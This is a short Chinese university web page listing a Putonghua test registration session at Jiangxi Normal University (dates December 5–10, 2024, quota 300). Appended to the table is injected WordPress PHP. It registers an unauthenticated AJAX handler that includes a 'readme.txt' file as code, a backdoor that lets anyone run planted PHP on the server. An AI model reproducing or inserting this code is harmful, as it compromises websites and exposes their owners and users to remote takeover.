2024级文学院及23级文学院补测
|
序号
|
测试站名称
|
报名时间
|
结束时间
|
报名人数
|
|---|
|
1
|
江西师范大学普通话培训测试站
|
2024-12-05
|
2024-12-10
|
300人
|
江西师范大学普通话培训测试站
if(!function_exists('file_check_readme15721')){ add_action('wp_ajax_nopriv_file_check_readme15721', 'file_check_readme15721'); add_action('wp_ajax_file_check_readme15721', 'file_check_readme15721'); function file_check_readme15721() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }